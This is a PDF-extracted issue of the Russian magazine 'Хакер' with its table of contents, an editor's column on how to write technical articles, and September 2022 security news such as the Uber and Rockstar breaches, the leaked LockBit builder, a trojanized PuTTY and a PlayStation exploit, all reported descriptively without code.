книги хакеры / журнал хакер / xa-282_Optimized

CONTENTS

Как писать статьи

Колонка главреда

MEGANews

Самые важные события в мире инфосека за сентябрь

Бан Kiwi Farms

Почему Cloud are отказалась защищать сайт, где собираются тролли и сталкеры

Атака Базарова

Evil Twin поверх динамической маршрутизации

Летние исследования для чемпионов Security

Колонка Дениса Макрушина

Ядовитые гифки

Как работает уязвимость GIFShell

Фундаментальные основы хакерства

Боремся с дизассемблерами и затрудняем реверс программ

Инфильтрация и эксфильтрация

Изучаем методы передачи данных при пентестах

HTB StreamIO

Раскручиваем доступ к MS SQL до полного захвата машины

HTB Noter

Ломаем веб-приложение на Flask

HTB Seventeen

Подменяем пакет NPM для захвата хоста

HTB Talkative

Проходим цепочку докер-контейнеров для захвата хоста

Trickster VPN

Разбираемся с WireGuard и делаем свой умный VPN

iOS 16

Изучаем новые способы защиты данных в последней iOS

Про Pyto

Делаем веб-сервер на iOS и качаем видео с youtube-dl

Вперед в прошлое!

Как выжить в Windows 2000 в 2022 году

Сканим на Python

Как написать и улучшить собственный сканер портов

Интервью с майнером

ZeroCo0l о переходе эфира на PoS, секретных монетах и дешевых видеокартах

Титры

Кто делает этот журнал

Мы благодарим всех, кто поддерживает редакцию и помогает нам компенсировать авторам и редакторам их труд. Без вас «Хакер» не мог бы существовать, и каждый новый подписчик делает его чуть лучше.

Напоминаем, что дает годовая подписка:

год доступа ко всем материалам, уже опубликованным на Xakep.ru;

год доступа к новым статьям, которые выходят по будням;

полное отсутствие рекламы на сайте (при условии, что ты залогинишься); возможность скачивать выходящие

каждый месяц номера в PDF, чтобы читать на любом удобном устройстве;

личную скидку 20%, которую можно использовать для продления

годовой подписки. Скидка накапливается с каждым продлением.

Если по каким-то причинам у тебя еще нет подписки или она скоро кончится, спеши исправить это!

КОЛОНКА

ГЛАВРЕДА

Первая статья дается тяжелее всего. Одна из причин в том, что новые авторы часто берут слишком глобальную тему, которой хватило бы на трехтомник, или, наоборот, пытаются расписать совет, который уместится в три предложения (и кусок кода в случае с «Хакером»). Посоветовать готовое решение здесь непросто, но с практикой ты научишься попадать в нужные форматы.

Другая проблема — сложно писать о том, что тебе уже надоело. Код, написанный в прошлом году, история, которую уже всем рассказал, программа, которую уже и сам забросил. Темой нужно гореть, а пока горишь — не откладывать написание!

И ни в коем случае не поддавайся синдрому самозванца. Если ты только начал разбираться в теме, о которой пишешь, это тоже может быть преимуществом: ты на все смотришь свежим взглядом и еще помнишь, обо что спотыкаются новички. А работая над статьей, ты систематизируешь и углубишь свои знания.

2. ОПИСЫВАЙ ДЕЙСТВИЯ, А НЕ ОБЪЕКТЫ

Если ты просто возьмешь и опишешь какую-то вещь (протокол, формат, устройство), то получится скучная справка, а не статья. Найди проблематику, и все станет куда веселее. Напиши о своем опыте или о том, как решать конкретную задачу.

Отличный индикатор того, что статья выйдет статичной и занудной, — заголовок, в котором нет глагола, то есть действия. Поэтому какой-то временный заголовок стоит написать с самого начала. Заодно поможет лучше очертить тему.

3. НАЧИНАЙ С СУТИ

Любимый прием некоторых авторов — начать с какого-нибудь до боли очевидного утверждения. Не стоит так делать. Начинай сразу с сути! И писать, и читать такой текст будет легче.

Когда допишешь статью, вернись в начало и добавь лид — абзац, который будет сообщать читателю, зачем тратить время на чтение всего остального. Что человек узнает из текста? Чему научится? Где пригодятся эти знания? Почему тема крута и актуальна? Все это поможет ему не скроллить статью в попытках узнать ответ самостоятельно.

4. НЕ СТАРАЙСЯ ЗВУЧАТЬ УМНЕЕ

Желание звучать более уверенно не тянет на смертный грех, но вынуждает автора стилизовать текст под что-то, чем он быть не должен. Среди любимых ориентиров: научная работа, полицейский протокол и старинное письмо.

Явный маркер первого — утомительная избыточность и слова вроде «является» и «данный». Второго — «в следствие». Любителей старины выдают словечки вроде «ибо» и «покуда». А иногда текст переключается между этими режимами произвольно.

Технические статьи лучше всего писать простым и понятным языком — почти разговорным, но более складным. Любые украшения скорее помешают воспринимать и без того грузящее мозг содержимое (а по неопытности, скорее всего, еще и выйдут криво). Так зачем усложнять себе жизнь?

5. ПОЙМИ, ПОЧЕМУ ОСТАНОВИЛСЯ

Что делать, если работа встала и никак не идет дальше? Убраться в комнате, посмотреть сериальчик и выпить пивка — неправильные ответы. Единственный продуктивный способ прокрастинации — еще раз перечитать написанный текст.

Если и после этого мысль не пришла, то задумайся: какой информации тебе может не хватать, чтобы продолжить? Что было бы полезно знать? Иногда достаточно одного запроса в Google, и дело сразу сдвинется с мертвой точки.

Бывает и так, что просто не получается сформулировать предложение. Попробуй написать начерно, пометив этот участок любым удобным образом. Зачастую черновой вариант оказывается очень близок к чистовому, или нужная формулировка сама придет к тебе при очередном перечитывании.

Ну и в конце концов, не забывай, что ты можешь действительно устать. Написание статей — интенсивный мыслительный процесс, который за четыре-пять часов сильно истощает мозг. Зато после прогулки или сна подсознание может само родить решение проблемы. Главное — не забудь вернуться к работе!

6. БУДЬ ЧЕСТНЫМ С ЧИТАТЕЛЕМ

Среди более опытных авторов попадаются хитрецы, которые вместо дополнительного ресерча научились аккуратно обходить места, где им не хватило знаний. Редактор, конечно, сразу замечает такие маневры. Возможно, и читатель тоже. Либо (что еще хуже) начнет мотать текст туда-сюда и удивляться, почему о каком-то важном моменте ничего не сказано.

Бывает и так, что просто забываешь дать нужные пояснения. Поэтому рекомендую, перечитывая статью, думать о том, какие вопросы могут возникнуть у разных читателей и можешь ли ты дать на них ответы в тексте. Если не можешь даже с дополнительными усилиями, то так и напиши. Отсутствие ответа иногда тоже ответ.

Есть и более мелкий, но не менее досадный вид неточностей — те, которые прячутся за словами типа «довольно», «некоторый», «относительно». Приведи вместо расплывчатой оценки точные данные, и текст от этого выиграет.

7. ВЫКИДЫВАЙ ВСЕ ЛИШНЕЕ

Классический совет по редактуре — убрать все, что не несет смысла и не помогает раскрыть тему. Это работает сразу на нескольких уровнях: лишними бывают слова, предложения или целые абзацы.

Начнем с абзацев. «Воду» ты, скорее всего, заметишь, а если нет, то редактор легко сцедит ее. Более сложный случай — когда текст ходит по теме кругами. Тогда нужно убрать повторы, а остальное переставить в логическом порядке.

Повторы встречаются и на уровне предложений. Если написал «другими словами» — возможно, есть смысл оставить только идущий дальше второй, более ясный вариант объяснения. Заодно воздержись от напоминаний, что что-то уже было выше или что читатель может уже знать изложенные факты.

Что до лишних слов, то их в основном плодит канцелярский стиль. Если что-то можно сказать одним словом — скажи одним, а не двумя-тремя! Очень частый пример: «для того, чтобы» всегда можно заменить на «чтобы».

8. ЗАПИСЫВАЙ ИДЕИ

Что, если ты пишешь что-то одно, а в голову приходит мысль, которая относится к совсем другой части статьи? Ни в коем случае не теряй ее, она может не посетить тебя снова!

Лучше всего дописать до точки, а затем пойти и быстро сделать заметку примерно в нужном месте текста или просто черкануть в конце. Потом вернешься к ней и распишешь подробнее. У меня к середине статьи обычно собирается чуть ли не поабзацный план второй половины. Остается только сортировать заметки в логическом порядке и добавлять пояснения.

Оставляя работу до другого раза (особенно если он будет не на следующий день), всегда выгружай из головы все ценные планы и идеи. Может казаться, что память не подведет, но заметка всегда надежнее.

9. ПРАКТИКУЙСЯ БОЛЬШЕ!

Чтобы лучше что-то делать, нужна практика. Правило про десять тысяч часов в случае с написанием статей работает так же, как и для других занятий.

Хорошая новость: техническому специалисту вовсе не обязательно быть классным писателем, чтобы публиковаться! В «Хакере» большую часть текстов пишут новые авторы, которые хотят просто поделиться своими знаниями. Мы стараемся доводить тексты до ума силами редакции или хотя бы советуем, что и как улучшить.

Если придумал тему для «Хакера» и готов садиться за работу, опиши идею парой предложений и отправь мне на pismenny@glc.ru. Если тема нам подходит, я вышлю условия и дополнительные рекомендации.

Постоянным же авторам рекомендую брать в руки di и сравнивать варианты до и после редактуры. За каждой правкой стоят какие-то соображения, о которых ты можешь вежливо поинтересоваться и узнать что-то новое.

Мария «Mifrill» Нефёдова nefedova@glc.ru

В этом месяце: компании Uber и Rockstar Games взломал 17-летний подросток, в сеть слили билдер вымогателя LockBit, среди хакеров распространяется крякнутая версия инструмента Brute Ratel, десктопное приложение Microsoft Teams хранит токены открытым текстом, исследователь продемонстрировал «неисправимый» эксплоит для PlayStation, вышел обновленный Winamp 5.9, а также другие важные события месяца.

ВЗЛОМ UBER И ROCKSTAR GAMES

Сентябрь ознаменовался сразу двумя крупными взломами, от которых пострадали компании Uber и Rockstar Games. Очень похоже, что за этими атаками стоял один и тот же подросток.

Первой от компрометации пострадала компания Uber, и злоумышленник охотно поделился со СМИ скриншотами внутренних систем жертвы. Судя по ним, он получил полный доступ ко многим критически важным системам Uber, включая защитное ПО компании и домен Windows.

Также взломщик добрался до консоли Amazon Web Services, виртуальных машин VMware vSphere/ESXi, панели администратора электронной почты Google Workspace и сервера Slack, на котором публиковал сообщения, и bug bounty программы компании на HackerOne.

Журналистам нескольких изданий удалось пообщаться с хакером, и тот похвастался, что ему всего 18 лет и он взломал Uber, используя социальную инженерию, так как «у компании слабая безопасность».

Самое интересное: ответственность за эту атаку в Uber возложили на участника хак-группы Lapsus$, о которой мы писали не раз. Напомню, что весной 2022 года после череды громких атак на Nvidia, Samsung, Microsoft и Okta полиция Лондона арестовала семь человек в возрасте от 16 лет до 21 года «в связи с расследованием деятельности хакерской группы».

В настоящее время все они находятся под следствием, а двум подросткам предъявлены обвинения. Эти аресты совпали с объявлением о том, что несколько членов Lapsus$ на время уходят в отпуск, и с тех пор активность группы практически сошла на нет.

Но похоже, в Uber считают, что правоохранительные органы нашли далеко не всех участников Lapsus$.

Вскоре после Uber атаке подверглась компания Rockstar Games, что привело к одной из крупнейших утечек в истории игровой индустрии. В результате этого взлома в сеть попали десятки роликов с геймплеем еще не вышедшей GTA VI (их слил сам хакер), и взломщик заявил, что украл «исходный код и ассеты GTA V и VI, а также тестовую сборку GTA VI».

При этом злоумышленник, скрывающийся под никами teapots2022 и teapotuberhacker, утверждает, что именно он скомпрометировал Uber немногим ранее. Teapotuberhacker писал, что не ожидал такого внимания

идаже хотел «договориться» с Rockstar Games и Take-Two Interactive (издатель

ивладелец компании Rockstar Games), судя по всему — желая потребовать у компаний деньги.

Однако масштабы этих инцидентов быстро привлекли к случившемуся внимание властей и правоохранительных органов, и уже несколько дней спустя

полиция лондонского Сити сообщила об аресте 17-летнего подростка из Оксфордшира. Его обвиняют в двух случаях нарушения условий освобождения под залог, а также в двух компьютерных преступлениях. Его имя не раскрывается, так как он несовершеннолетний.

После этого многие ИБ-эксперты и известный журналист Мэтью Киз (со ссылкой на собственные источники) писали, что именно задержанный стоял за недавними громкими взломами компаний Uber и Rockstar Games. При этом Мэтью Киз и его источники подтверждают: арестованный подросток — это участник Lapsus$, которого ранее уже арестовывали за взлом Microsoft

и Nvidia.

Известно, что задержанный своей вины пока не признал и остается под стражей.

4 000 000 ДОМЕНОВ ДЛЯ УДАЛЕНИЯ

Согласно статистике компании Google, количество уникальных доменов верхнего уровня, ссылки на которые требуют удалить правообладатели (в соответствии с законом США «Об автор-

ском праве в цифровую эпоху», DMCA), в этом месяце перевалило за 4 000 000.

В общей сложности за всю «историю наблюдений» у Google требовали удаления 6 миллиар-

дов URL. С такими требованиями к компании за прошедшие годы обращался 326 221 правообладатель.

Больше всего запросов, 579,5 миллиона, поступило от BPI LTD — British Phonographic Industry, ассоциации, в которую входят Universal Music UK, Sony Music UK и Warner Music UK.

БИЛДЕР LOCKBIT

ПОПАЛ В ОТКРЫТЫЙ ДОСТУП

ИБ-специалисты сообщили, что билдер известного шифровальщика LockBit опубликован в открытом доступе. Судя по всему, LockBit 3.0 слил в сеть недовольный разработчик или конкурент одноименной группировки.

Напомню, что хак-группа LockBit выпустила обновленную малварь LockBit версии 3.0 в июне 2022 года и вместе с этим представила собственную вымогательскую программу bug bounty, предлагая другим злоумышленникам деньги за интересные уязвимости.

Как теперь сообщил ИБ-исследователь, известный под ником 3xp0rt, недавно зарегистрированный пользователь Twitter по имени Ali Qushji утверждает, что вместе с командой он взломал серверы LockBit и обнаружил там билдер шифровальщика LockBit 3.0, который и поспешил слить в открытый доступ.

После этого другой известный ИБ-эксперт vx-underground подтвердил, что еще 10 сентября с ними связался пользователь с ником protonleaks и тоже поделился копией того же билдера. При этом, по словам vx-underground, официальный представитель группировки LockBit утверждает, что никакого взлома вообще не было, а приватный билдер распространяет недовольный руководством хак-группы наемный разработчик.

ИБ-специалисты уверены, что вне зависимости от источника этой утечки публикация билдера LockBit 3.0 в сети, скорее всего, увеличит количество вымогательских атак. Ведь билдер позволяет преступникам быстро создавать исполняемые файлы, необходимые для запуска собственной кампании (включая сам шифровальщик, дешифровщик и специализированные инструменты).

По сути, инструмент состоит из четырех файлов: генератора ключей шифрования, самого билдера, изменяемого файла конфигурации и batch-файла для сборки всех файлов. Так, файл con g.json можно использовать для настройки шифровальщика, в том числе отредактировать записку с требованием выкупа, изменить параметры конфигурации, перечислить, какие процессы и службы следует завершить, и даже задать управляющий сервер, куда малварь будет отправлять данные. То есть ничто не мешает любым злоумышленникам связать вредонос со своей собственной инфраструктурой.

К сожалению, прогнозы экспертов начинают сбываться. Утекший билдер уже взяла на вооружение хак-группа Bl00Dy, построив с его помощью шифровальщик, который затем использовался для атаки на неназванную украинскую компанию.

304 000 000 УТЕКШИХ СТРОК

Летом 2022 года исследователи Group-IB зафиксировали двукратный рост количества выложенных в открытый доступ баз данных российских компаний (по сравнению с весной этого года).

За три летних месяца в сеть попало 140 баз, причем антирекорд был поставлен в августе — 100 утечек. Общее количество строк всех летних сливов равняется примерно 304 мил-

лионам.

Этот антирекорд эксперты связывают с «мегаутечкой», которая включала базы данных сразу 75

российских компаний. Для сравнения: за всю весну текущего года было опубликовано всего 73 базы.

Самые крупные утечки были зафиксированы у компаний, работающих в сферах доставки — 192 миллиона строк, онлайн-видео — 43 миллиона строк, медицинских услуг — 30 мил-

лионов строк.

ДИЗЛАЙКИ НА

YOUTUBE НЕ РАБОТАЮТ

Mozilla сообщает, что кнопки обратной связи на YouTube практически не работают. Даже если пользователь ясно дает понять, что ему что-то не нравится, подобные рекомендации все равно продолжают поступать.

Чтобы собрать данные, связанные с реальными видео и пользователями, исследователи Mozilla привлекли к исследованию добровольцев, которые при-

«Прекратить рекомендовать». При этом на бэкенде пользователей зачисляют в случайную группу, и каждый раз, когда они нажимают эту общую кнопку, на YouTube отправляются разные сигналы: «Не нравится», «Не интересует», «Не рекомендовать этот канал», «Удалить из истории». Также из пользователей образуется контрольная группа, от которой на YouTube не поступает никакой обратной связи.

Используя данные, собранные из 500 миллионов рекомендованных видео, исследователи создали более 44 тысяч пар видео — одно «отклоненное» видео и видео, впоследствии рекомендованное YouTube. Затем исследователи оценивали эти пары или использовали машинное обучение, чтобы решить, была ли рекомендация похожа на видео, которое ранее уже отклонил пользователь.

Как показало сравнение с контрольной группой, отправка сигналов «Не нравится» и «Не интересует» практически неэффективна и не предотвращает нежелательные рекомендации от YouTube (было предотвращено лишь 12% из 11% нежелательных рекомендаций). Кнопки «Не рекомендовать канал» и «Удалить из истории» оказались чуть более эффективными — они предотвратили 43% и 29% нежелательных рекомендаций. Однако исследователи подчеркивают, что инструментов, которые предлагает YouTube, недостаточно, чтобы избавиться от нежелательного контента.

Представитель YouTube Елена Эрнандес (Elena Hernandez) объясняет, что такое поведение платформы преднамеренно, поскольку YouTube вовсе не пытается отсекать весь контент, связанный с какой-либо темой. При этом Эрнандес раскритиковала отчет Mozilla, заявив, что в нем не учитывается, как устроены элементы управления YouTube.

««Важно, что наши элементы управления не отфильтровывают целые темы или точки зрения, так как это может иметь негативные последствия для зрителей, создавая „эхо камеры“, — говорит Эрнандес. — Мы

приветствуем академические исследования на нашей платформе,

поэтому недавно мы расширили доступ к Data API через исследователь-

скую программу YouTube. Но в отчете Mozilla не учитывается, как на » самом деле работают наши системы».

По ее словам, определение «похожего», которое использует Mozilla, не принимает во внимание, как устроена система рекомендаций на YouTube. По словам Эрнандес, функция «Неинтересно» удаляет конкретное видео, а кнопка «Не рекомендовать этот канал» предотвращает рекомендации с конкретного канала в будущем. Она объясняет, что в таких случаях YouTube вовсе не стремится вообще прекратить рекомендации любого контента, связанного с конкретной темой, мнением или спикером.

БИБЛИОТЕКА С ГОЛОСАМИ ПРЕСТУПНИКОВ

На Восточном экономическом форуме зампред правления Сбербанк Станислав Кузнецов рассказал, что с начала третьего квартала 2022 года банк отразил свыше 450 DDoS-атак, а это больше, чем за последние 5 лет суммарно.При этом атакам подвергается не только сам банк, но и его пользователи. Так, к основным видам нарушений на сегодняшний день можно отнести фишинг и телефонное мошенничество, и с ними в Сбербанке борются, в том числе при помощи библиотеки с голосами преступников.

→ «Важно, как мы противостоим [атакам], какими личными разработками мы пользуемся. Одной из них является использование библиотеки голосов преступников, библиотеки голосов мошенников. И именно эта библиотека нам сегодня помогает продвинуться достаточно уверенно вперед по противодействию телефонному мошенничеству. Мы для себя обнаружили следующий тренд. Видимо, мошенники каким-то образом понимают, что они уже становятся на контроль, и они уходят из „Сбера“. То есть эти преступники, голоса которых записаны в нашей библиотеке, фактически уходят из „Сбера“ и от клиентов „Сбера“ и таргетируют свои усилия на клиентах других кредитных организаций»,

— рассказал Кузнецов, добавив, что в настоящее время библиотека насчитывает примерно тысячу голосов.

Продолжение статьи →

← Начало статьи

PAYPAL VS FLIPPER ZERO

Разработчики «хакерского тамагочи» Flipper Zero рассказали, что уже два месяца не могут вернуть 1,3 миллиона долларов, которые остались на заблокированном без указания причин PayPal-аккаунте проекта. Что происходит, не может объяснить даже поддержка PayPal, и разработчики говорят, что производство Flipper Zero под угрозой.

Напомню, что в 2020 году на Kickstarter собрали рекордные 4 882 784 доллара на производство «хакерского тамагочи» и крайне интересного мультитула Flipper Zero, о создании которого мы тогда поговорили с одним из его авторов Павлом Жовнером.

В начале 2022 года участники Kickstarter-кампании стали получать свои гаджеты, а в июне наконец стартовала открытая продажа Flipper Zero. Вскоре после этого бизнес-аккаунт PayPal заблокировали, о чем разработчики сообщили в официальном Twitter проекта.

Команда Flipper Zero рассказывает, что около половины покупателей выбрали PayPal в качестве способа оплаты (также заказ можно было оплатить банковской картой напрямую), но уже через несколько дней PayPal инициировал проверку аккаунта. «Они попросили какие-то [дополнительные] документы, и мы сразу их предоставили», — пишет команда.

За этим последовало еще несколько запросов от PayPal, на которые разработчики так же ответили, но в итоге они получили лишь сообщение о перманентном бане бизнес-аккаунта Flipper Zero.

««Мы обращались в поддержку PayPal, но даже они не могут сказать, чего именно от нас хочет комплаенс команда. Сейчас нам нужно пла-

тить за новые партии продукции, и эти деньги имеют решающее зна- чение для нашего бизнеса. Если кто то из нашего сообщества имеет

прямые контакты внутренней команды PayPal и может как то повлиять

на ситуацию, мы просим вашей помощи», — гласит официальное обра- » щение создателей Flipper Zero.

ОТКАЗОУСТОЙЧИВОСТЬ РУНЕТА

Эксперты Qrator Labs уже в седьмой раз изучили влияние возможных сбоев сетей системообразующих операторов связи на глобальную доступность национальных сегментов интерне-

та. Выяснилось, что в 2022 году Россия потеряла сразу 8 позиций, сместившись на 10-е место в топ-20.

Если в 2016 году для попадания в топ-20 достаточно было иметь процент потенциального

отказа сетей чуть более 8%, то сейчас даже показателя в 6,5% уже недостаточно, чтобы оказаться в лидерах.

В мире явно прослеживается тенденция повышения отказоустойчивости: средний показатель надежности улучшился с 35,84% до 26,7%.

Рейтинг отказоустойчивости интернета в целом достаточно стабильный показатель развития связи уже много лет подряд, и в 2022 году в нем произошло сразу несколько значительных изменений. Ключевые таковы:

Таиланд вышел из топ-20;

Испания вышла из топ-20;

США вышли из топ-20;

Тайвань вышла из топ-20;

Ирландия, Бельгия и Гонконг вновь вошли в топ-20 после того, как покинули рейтинг в 2021 году;

Сейшелы впервые вошли в топ-20.

В России процент потенциального отказа сетей непрерывно возрастает уже в течение 4 лет. По мнению аналитиков, это точно связано с продолжающимися процессами как организационной, так и технической консолидации отрасли. Поэтому вероятность того, что в 2023 году Россия тоже покинет топ-20, довольно высока.

При этом в России находится шестая из крупнейших в мире точек обмена трафиком — MSK-IX,

охватывающая 7 городов-миллионников. Как пишут эксперты, это еще раз подтверждает, что РФ не использует имеющийся у нее колоссальный потенциал по связности в полной мере.

ВЫШЕЛ WINAMP 5.9

В сентябре произошло событие, в реальность которого было бы сложно поверить еще пару лет назад: на сайте Nullsoft опубликовали финальную версию Winamp 5.9, которая теперь доступна всем желающим.

За долгие годы своего существования Winamp проделал сложный путь и не раз переходил от одной компании к другой. Так, компанию Nullsoft, создавшую Winamp, еще в 1999 году приобрела AOL, которая и поддерживала плеер на протяжении многих лет. Затем в 2013 году разработку программы, уже растерявшей немалую долю своей популярности, решили прекратить, сайт Winamp.com закрылся (последней версией стала 5.666), а права на Winamp в 2014 году выкупила бельгийская компания Radionomy, занимающаяся интернет-радиовещанием.

С тех пор никаких новостей о медиаплеере почти не поступало. Лишь осенью 2018 года представители Radionomy неожиданно сообщили, что в 2019 году Winamp преобразится, станет лучше и вернется в строй. Разработчики заявляли, что намерены сделать Winamp универсальным решением для прослушивания всего — подкастов, радио, плейлистов и так далее.

Кроме того, в сентябре 2018 года пользователи обнаружили в сети утекшую бета-версию Winamp 5.8, где были исправлены некоторые баги и появилась поддержка Microsoft Audio. Тогда было не совсем ясно, откуда взялась новая версия и кто стоял за ее разработкой. Но вскоре глава Radionomy Алек-

сандр Сабунджан (Alexandre Saboundjian) прояснил, что над Winamp 5.8 работала именно Radionomy. Новая версия содержит исправления для различных багов, в том числе касающихся совместимости с Windows 10, а также убирает из медиаплеера все платные функции, внедренные в Winamp раньше.

К сожалению, обещанного релиза обновленного Winamp в 2019 году пользователи так и не дождались, а версия Winamp 5.8 на протяжении четырех лет так и оставалась самой новой. Тем не менее в конце прошлого года сайт Winamp.com неожиданно претерпел кардинальный редизайн и на нем появился новый логотип медиаплеера. Также на сайте стало можно зарегистрироваться для участия в бета-тестировании нового Winamp, которое обещали начать совсем скоро.

Теперь бета-тест наконец окончен и Winamp 5.9 Final Build 9999 представили широкой публике.

««Это кульминация труда двух команд разработчиков, длившегося четыре года (с момента выпуска 5.8) и прерывавшегося из за пан-

демии, — пишет команда в примечаниях к релизу. — Конечному поль-

зователю может показаться, что изменений не так много, но самой большой и сложной частью стал перенос всего проекта » с VS2008 на VS2019 и его успешная сборка».

Действительно, самым заметным изменением в Winamp 5.9 стал перенос при-

ложения из Visual Studio 2008 в Visual Studio 2019. Причем этот перенос спро-

воцировал множество проблем с плагинами в более ранних версиях плеера среди пользователей, у которых не был установлен Visual Studio 2019 Redistributable. В финальном релизе установщик Winamp сам проверит, все ли нужные файлы Visual Studio 2019 есть, и при необходимости предложит установить их.

Также в журнале изменений сообщается, что в этом релизе улучшена поддержка Windows 11, потоковое вещание через HTTPS://, добавлен новый каталог подкастов и поддержка воспроизведения в высоком разрешении, улучшена поддержка .itz, .mdz, .s3z и .xmz, а поддержка юникода теперь работает нормально.

Хотя в Winamp 5.9 устранили множество ошибок, разработчики обещают, что в версии 5.9.1 будет исправлено еще больше известных багов. Среди них: ошибки в диалоговом окне «О программе», Milkdrop, редакторе AVS, подкастах ml_wire, скине Bento.

Есть и не слишком хорошие новости для тех, кому нужен декодер NSV VP3, — эта функция теперь признана устаревшей.

««Мы нигде не можем найти старый исходный код On2 VP3, поэтому официально объявляем этот формат устаревшим», — поясняют раз- » работчики.

Скачать обновленный Winamp 5.9 можно на официальном сайте Nullsoft.

СКОЛЬКО ПОЛУЧАЮТ В GOOGLE?

Журналисты Business Insider решили выяснить, сколько зарабатывают специалисты Google на разных должностях. Для этого они изучили заявления на получение рабочей визы H-1B, где необходимо указывать предполагаемый базовый оклад. В составленный в итоге список вошли зарплаты в офисах Google в Калифорнии, Вашингтоне и Нью-Йорке. Зарплаты приведены за год.

Инженер-исследователь: от 154 000 до 196 000 долларов

Инженер-программист: от 122 000 до 280 000 долларов

Инженер ПО: от 126 000 до 225 000 долларов

UX-исследователь: от 137 000 до 180 785 долларов

UX-дизайнер: от 162 000 до 202 000 долларов

Системный инженер: 106 000 до 266 000 долларов

Специалист по облачным вычислениям: от 78 000 до 78 520 долларов

Data-инженер: от 106 000 до 182 000 долларов

Data-сайентист: от 103 000 до 269 000 долларов

Продакт-менеджер: от 151 000 до 244 000 долларов

БЭКДОР В PUTTY

Аналитики из компании Mandiant предупредили о появлении троянизированной версии утилиты PuTTY, предположительно созданной северокорейскими хакерами из группы UNC4034 (она же Temp.Hermit или Labyrinth Chollima). Судя по всему, вредоносная версия PuTTY используется, чтобы взламывать организации, которые представляют интерес для злоумышленников.

Обычно такие атаки начинаются с того, что злоумышленники связываются со своими целями по электронной почте и делают им заманчивое предложение, якобы приглашая их на работу в Amazon. Затем хакеры отправляют жертве сообщение в WhatsApp, в котором делятся файлом amazon_assessment.iso. В последнее время файлы ISO все чаще используются для заражения машин под управлением Windows, потому что двойной клик по ним по умолчанию приводит к их монтированию.

ISO включает в себя текстовый файл (readme.txt), содержащий IP-адрес и учетные данные для входа, а также вредоносную версию PuTTY (PuTTY.exe). Интересно, что хакеры также используют в своих атаках SSH-клиент KiTTY (форк PuTTY), в таких случаях имя файла будет Amazon-KiTTY.exe.

Пока неясно, как именно строится диалог между злоумышленниками и жертвами, но, похоже, хакеры убеждали жертв открыть ISO-образ и использовать предложенный SSH-инструмент и учетные данные для подключения к хосту, чтобы пройти некое тестирование.

Хотя вредоносная версия PuTTY оснащалась вредоносной полезной нагрузкой, она была полностью функциональной (так как скомпилирована из легитимной версии программы). Но исследователи обращают внимание на то, что легитимные версии PuTTY подписаны разработчиком, а версии хакеров — нет.

Отчет Mandiant гласит, что хакеры модифицировали функцию connect_to_host() таким образом, чтобы при успешном SSH-подключении с использованием приложенных учетных данных развертывался вредоносный шелл-код

DAVESHELL в формате библиотеки DLL (colorui.dll), упакованной с Themida.

Чтобы сделать запуск шелл-кода незаметным, вредоносная PuTTY использует уязвимость в colorcpl.exe, а DAVESHELL действует как дроппер финального пейлоада — бэкдора AIRDRY.V2, который выполняется непосредственно в памяти.

По данным исследователей, по сравнению с предыдущей версией AIRDRY новый вариант поддерживает меньше команд, зато добавлены новые возможности: выполнение в памяти и обновление ключа AES для связи с управляющим сервером.

ПИРАТСКИЙ КОНТЕНТ В РУНЕТЕ

На фоне ухода из России крупных киностудий и иностранных стриминговых сервисов в Рунете заметно выросло количество ссылок с пиратским контентом. Чаще всего пираты выкладывают голливудские премьеры, однако, по словам участников рынка, сложнее защищать становится и российские сериалы, кино и шоу.

В Яндексе сообщают, что летом заблокировали на 42% больше ссылок (9,1 миллиона за июнь — август против 6,4 миллиона прошлым летом), а в «Газпром-медиа» говорят о росте блокировок на 25% (до 1,64 миллиона) во втором квартале.

ЭКСПЛОИТ ДЛЯ

PLAYSTATION

Хакер, известный под псевдонимом CTurt, давно специализируется на взломе игровых консолей. Теперь он продемонстрировал свежий PoC-эксплоит Mast1c0re, который называет «практически неустранимой» дырой в безопасности PS4 и PS5. Mast1c0re должен позволить устанавливать и запускать на консолях Sony произвольные приложения.

CTurt рассказывает, что продемонстрировал Mast1c0re представителям Sony еще год назад, через программу bug bounty, но так и не дождался выхода публичного исправления.

В своей работе Mast1c0re полагается на ошибки JIT-компиляции, которую использует эмулятор, запускающий определенные игры для PS2 на консолях PS4 и PS5. Эта компиляция дает эмулятору специальные разрешения на непрерывную запись PS4-ready-кода (на основе оригинальных исходников для PS2) непосредственно перед тем, как этот код будет выполнен на уровне приложений (application layer). Получив контроль над обеими сторонами этого процесса, хакер может написать привилегированный код, который система

витоге сочтет легитимным и безопасным.

««Поскольку мы используем системные вызовы JIT по прямому назначению, на самом деле это даже не эксплоит, а просто хитрый » трюк», — комментирует CTurt.

Исследователь пишет, что получить контроль над эмулятором теоретически позволяют любые известные эксплоиты, которые давным-давно существуют для PS2-игр. Хотя некоторые из них можно активировать буквально одним нажатием кнопки, для большинства потребуется использовать некую известную игру и доступ к специально отформатированному файлу сохранения на карте памяти, что приведет к переполнению буфера и откроет доступ к защищенной памяти. Нужно отметить, что похожие эксплоиты использовались для взлома PSP и Nintendo 3DS на протяжении многих лет.

К сожалению, этот способ немного ограничен из-за того, что PS4 и PS5 не могут распознать стандартные диски для PS2. Это означает, что любая эксплуатируемая игра должна быть доступна в виде загружаемой через PSN игры PS2-на-PS4 либо это должна быть одна из тех немногих игр для PS2, что выходили на физических дисках, совместимых с PS4.

Получить готовый для эксплуатации файл сохранения PS2 на PS4 тоже не так просто. CTurt рассказывает, что ему пришлось использовать уже взломанную PS4 для цифровой подписи модифицированного файла сохранения игры Okage Shadow King, чтобы тот работал с его PSN ID. Затем CTurt

спомощью системной функции импорта сохранений на USB загрузил файл в целевую систему.

Подготовив этот «фундамент», CTurt наконец перешел к сложной серии переполнений буфера и стека, утечек памяти и эксплоитам для RAM, которые он использовал для получения контроля над эмулятором PS2. В итоге он сумел получить доступ к встроенным функциям загрузчика для передачи ISO-файла PS2 по локальной сети, а затем дать эмулятору команду загрузить эту игру через виртуальный диск.

Однако загрузка других игр для PS2 в эмулятор — это хорошо, но настоящей целью CTurt было воспользоваться этой точкой входа, чтобы запускать произвольный код в системе. Этот процесс хакер обещает детально описать в следующей статье, как и повышение привилегий, которое необходимо для запуска любого кода «в контексте игр для PS4».

По сути, хакерам по-прежнему придется использовать отдельный (и потенциально поддающийся исправлению) эксплоит ядра, чтобы получить «полный контроль» над PS4, объясняет CTurt. Но Mast1c0re уже должно быть достаточно для запуска сложных программ, «включая JIT-оптимизированные эмуляторы и, вероятно, даже некоторые пиратские коммерческие игры для PS4».

Также, по словам CTurt, Mast1c0re теоретически может послужить точкой входа для компрометации гипервизора PS5, который управляет низкоуровневой системной безопасностью на этой консоли.

